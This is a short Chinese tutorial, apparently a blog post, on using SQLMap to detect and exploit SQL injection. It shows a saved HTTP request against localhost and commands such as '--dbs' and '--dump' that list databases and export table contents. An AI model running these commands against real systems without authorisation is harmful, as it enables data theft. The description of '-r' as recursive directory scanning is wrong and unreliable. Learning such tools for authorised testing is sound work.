SQLMap 是一个功能强大的自动化 SQL 注入工具,它可以用于检测和利用 SQL 注入漏洞。以下是 SQLMap 的使用教程的基本步骤:
1.安装 SQLMap: 首先,你需要从 SQLMap 的官方网站下载并安装 SQLMap 工具。根据你的操作系统选择适当的版本,并按照官方提供的安装说明进行安装。
您可以下载最新的zip安装包或tar安装包。也可以通过克隆Git仓库来下载sqlmap:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6, 2.7 and 3.x on any platform.
2.识别目标: 在使用 SQLMap 之前,你需要识别目标应用程序的 URL 或请求中的参数,这些参数可能存在 SQL 注入漏洞。你可以使用浏览器开发者工具或其他抓包工具来分析应用程序的请求。
右键然后Copy出request header,放到一个txt文件中。如request.txt
GET /list?value=Tom HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Host: localhost:8080
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
3.运行 SQLMap: 打开终端或命令提示符,导航到 SQLMap 的安装目录,并执行以下命令来启动 SQLMap:
● -r :以递归方式扫描指定目录下的所有文件。
● -u :连接目标网站并进行扫描。
● --dbs:列出数据库的名称。 示例:--dbs
● --tables:列出数据库中的所有表。 示例:--tables
● --columns:列出指定表中的所有列。 示例:--columns -T users
● --dump:导出指定表中的数据。 示例:--dump -T users
python sqlmap.py -r request.txt --batch --dbs
4.检测漏洞: 运行扫描命令后,SQLMap 会自动检测目标应用程序中的 SQL 注入漏洞。它会尝试不同的注入技术和攻击模式,以发现可利用的漏洞。
可以看到已经打印出数据库名称,如果是--dump命令打印的就是数据库表中的数据。
可以看到直接把数据表中的数据全部查出来了。想想都可怕!!!
官方文档
================================
如果文章对你有帮助,请不要忘记加个关注、点个赞!!!